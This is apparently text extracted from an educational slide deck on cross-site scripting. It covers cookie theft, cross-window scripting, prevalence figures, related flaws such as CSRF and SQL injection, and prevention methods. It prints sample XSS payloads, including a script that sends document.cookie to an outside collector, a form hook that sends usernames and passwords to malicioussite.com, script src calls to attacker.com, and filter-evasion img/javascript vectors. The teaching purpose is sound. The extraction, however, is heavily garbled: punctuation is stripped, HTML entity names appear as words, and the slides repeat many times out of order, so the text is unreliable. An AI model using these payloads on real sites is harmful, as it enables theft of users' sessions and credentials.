SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakage
• Client can reveal cookies to a 3rd party (session state, order info, etc.):
  http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
• Client can reveal posted form items to a 3rd party (userID/passwd, etc.):
  <form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>
• Client can be tricked into accessing/posting spoofed info to a trusted server:
  www.trustedserver.com/xss.asp?name=<iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
37
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits the zone concept in certain browsers and usually executes code with greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]
Lastly, SQL injection exploits a vulnerability in the database layer of an application: when user input is incorrectly filtered, arbitrary SQL statements can be executed by the application.
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious script executes in a context that appears to have originated from the legitimate server, it has full access to the retrieved document and may send data contained in the page back to the attacker's site. If the embedded script can also interact with the legitimate server without alerting the victim, the attacker can post data to other pages on that server in the victim's name.
20
By Scripting
21
Script can read all HTML content/tags in the other window.
Script can set/delete tags/content in the other window: we can read and set form values, then run submit().
Script can set variables and call functions in the other window.
document.write can allow script to create new tags/content in the other window.
This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it is in the same document.domain.
If we can forward cookies, then we can also forward any other JavaScript-accessible content to an attacker: page contents, form values (including hidden fields), JavaScript variables/state and JavaScript errors.
22
Some FACTS about XSS attacks
23
By survey:
1st-generation XSS was against public sites and ran against everyone that visited the site.
2nd-generation XSS focused on sites that reflect user input back to the user (reflected XSS).
24
• Cross-site scripting attacks are a special case of code injection.
• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.
[Diagram: Dynamic XSS with two-way comms]
Victim browser: the XSS against the site loads an IFRAME; script commands run there, and other documents on the site are loaded into it.
Exfiltration: <script src="attacker.com/innerHTML_of_IFRAME"> sends the iframe's contents from the XSS-vulnerable server's page to the attacker system.
The attacker system answers with new JavaScript (<script src="attacker.com">), so the attacker can keep issuing commands to the victim's browser.
26
Some prominent sites that have been affected in the past are: the search engine Google, the email services of Google and Yahoo, and the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.
Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.
27
Seeing all this, the question that arises is:
Then how can we prevent it?
28
Yes, some methods are there for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
